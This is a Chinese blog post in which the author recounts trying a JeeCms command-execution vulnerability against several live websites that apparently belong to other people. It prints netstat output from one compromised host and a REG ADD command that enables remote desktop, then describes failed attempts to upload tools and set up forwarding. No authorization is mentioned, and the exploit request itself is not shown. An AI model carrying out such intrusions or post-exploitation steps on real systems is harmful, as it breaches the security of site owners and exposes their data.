玩了下JeeCms命令执行漏洞

第一个站点

首先看了下信息,是管理员权限 (好像这种命令执行漏洞都是administrator权限吧。。。

玩了下JeeCms命令执行漏洞_第1张图片


然后就是看下开没开3389了。。

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1028           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5631           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:6666           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:7777           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8009           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8010           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8090           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8100           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:9089           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:2891         127.0.0.1:8100         LAST_ACK
  TCP    127.0.0.1:3171         127.0.0.1:8100         LAST_ACK
  TCP    127.0.0.1:4391         127.0.0.1:8100         TIME_WAIT
  TCP    127.0.0.1:4400         127.0.0.1:8100         ESTABLISHED
  TCP    127.0.0.1:8006         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8012         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8100         127.0.0.1:4400         ESTABLISHED
  TCP    192.168.5.41:80        172.18.10.2:41405      ESTABLISHED
  TCP    192.168.5.41:80        172.18.10.2:41980      TIME_WAIT
  TCP    192.168.5.41:139       0.0.0.0:0              LISTENING
  TCP    192.168.5.41:3241      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3242      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3243      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3244      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3245      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3246      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3247      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3248      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3249      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3250      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3251      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3252      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3253      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3254      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3255      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3256      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3257      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3258      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3259      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3260      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3261      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3262      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3263      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3264      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3265      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3267      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3268      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3269      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3270      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3271      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3272      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3273      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3274      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3275      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3276      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3277      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3278      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3279      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3280      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3281      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3282      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3283      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3284      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3285      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3286      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3287      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3288      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3289      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3290      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3291      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3292      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3293      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3294      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3295      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3296      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3297      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3298      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3299      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3300      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3301      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3303      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3304      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3305      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3306      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3307      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3308      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3309      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3310      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3311      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3312      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3313      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3314      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3315      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3316      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3317      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3318      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3319      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3320      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3321      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:3322      192.168.5.100:1521     ESTABLISHED
  TCP    192.168.5.41:4399      192.168.1.30:41001     SYN_SENT
  TCP    *.*.*.*:139    0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*                    
  UDP    0.0.0.0:5632           *:*                    
  UDP    127.0.0.1:123          *:*                    
  UDP    127.0.0.1:1031         *:*                    
  UDP    127.0.0.1:1087         *:*                    
  UDP    192.168.5.41:123       *:*                    
  UDP    192.168.5.41:137       *:*                    
  UDP    192.168.5.41:138       *:*                    
  UDP    *.*.*.*:123            *:*                    
  UDP    *.*.*.*:137            *:*                                     

结果并没有开3389。。。

用注册表命令开下3389。。。


REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

然而并没有成功。。。ipconfig看了下是内网。。。本来像来个转发的。。结果上传不了任何东西

遂放弃 (没错,我就是这样一个半途而废的人


第二个站点,居然还是FreeBSD的。。太厉害了。。

玩了下JeeCms命令执行漏洞_第2张图片


然而执行命令没有任何回显。。而且上传东西返回500。。。

第三个站点

哪有那么容易找到啊。。。。于是。。。啥都没做到。。只是体验了一把命令执行 2333


当然我发现了一个很有趣的东西

玩了下JeeCms命令执行漏洞_第3张图片

whatcms会出现这个 hhhhh

你可能感兴趣的:(渗透测试)